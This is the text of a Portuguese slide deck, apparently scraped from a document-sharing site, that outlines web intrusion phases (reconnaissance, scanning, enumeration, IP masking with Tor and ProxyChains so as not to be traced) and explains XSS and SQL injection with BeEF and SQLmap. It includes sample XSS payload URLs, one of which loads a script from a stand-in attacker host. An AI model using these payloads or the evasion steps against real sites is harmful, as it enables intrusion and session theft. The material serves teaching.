Escolar Documentos
Profissional Documentos
Cultura Documentos
• Exploração de vulnerabilidades
– Sql Injection - SQLmap
– XSS - Beef
Reconhecimento
• Footprint
• Consulta de Whois
• Google hacking
Essa é a fase em que se conhece o ambiente
que vai ser invadido.
Varredura
• Network Mapper
• SHODAN
Fase em que e feita uma análise para listar
todos os serviços rodando o alvo
Enumeração
• Captura de Banners
• FingerPrint e service Scan
Fase de listagem e análise de serviços
vulneráveis
Privacidade
• Mascarando IP
• ProxyChains
• VNP’s gratuitas
• Tor
Fase de mascaramento de IP para
não deixar rastros e não ser descoberto
Vulnerabilidades abordadas
• XSS - Beef
• SQLi - SQLMap
Cross-site scripting (XSS)
• O que é ?
• Tipos de XSS
– Não persistente (Reflected)
• Exemplos
• Consequências
– Persistente (Stored)
• Exemplos
• Consequências
• Como se proteger ?
O que é ? - Cross-site scripting (XSS)
• O ataque de Cross-site scripting (XSS) é um ataque encontrado
normalmente em aplicações WEB que permite ao atacante inserir
código malicioso em uma página visitada por outro usuário. Devido
muita das vezes a Aplicação no lado do servidor não tratar
devidamente a entrada de dados .
Tipos de XSS - Cross-site scripting (XSS)
• Não Persistente (Reflected)
– Os não persistentes são os mais comuns, sendo os
principais responsáveis por ataques de phishing.
http://busca.SiteExemplo.com.br/busca/busca?q=%22%
3E%3Cscript%3ECODIGOMALICIOSO%3C%2Fscript
%3E&x=12&y=9
– Consequências:
– Exemplo
– Fórum Vulnerável a XSS Persistente com Armazenamento no Servidor
– Nessa página, usuários podem deixar mensagens para outros lerem.
– O atacante vai deixar um código malicioso e para cada usuário que visite a
página vai aparecer a mensagem.
Tipos de XSS - Cross-site scripting (XSS)
• Persistente (Stored)
– Consequências
– São semelhantes do Não persistente (Reflected), fazendo com que a vitima
envie qualquer dados ao atacante.
– Exemplo:
• Caso a página possuísse o seguinte trecho de código ela conseguiria inserir
scripts malicioso no contexto do site sem o conhecimento do lado servidor
ser afetado.
• http://vitima.com/teste.html#><script src=”http://bad/bad.js”></script>
Tipos de XSS - Cross-site scripting (XSS)
• Baseados no DOM (DOM Based)
– Consequências:
• Sequestro de sessão de usuários;
• Por outro lado, os ataques de XSS também podem ser evitados pela
implementação de um filtro de aplicações web, mais conhecido como Web
Application Firewall, e também por meio de mecanismos de prevenção que
estão embutidos em navegadores modernos.
SQL Injection
O que é ? – SQL Injection
• A Injeção de SQL, mais conhecida através do termo americano SQL
Injection, é um tipo de ameaça de segurança que se aproveita de
falhas em sistemas que interagem com bases de dados via SQL. A
injeção de SQL ocorre quando o atacante consegue inserir uma
série de instruções SQL dentro de uma consulta (query) através da
manipulação das entradas de dados de uma aplicação.
SQL Map
SQL Map
• O que é ?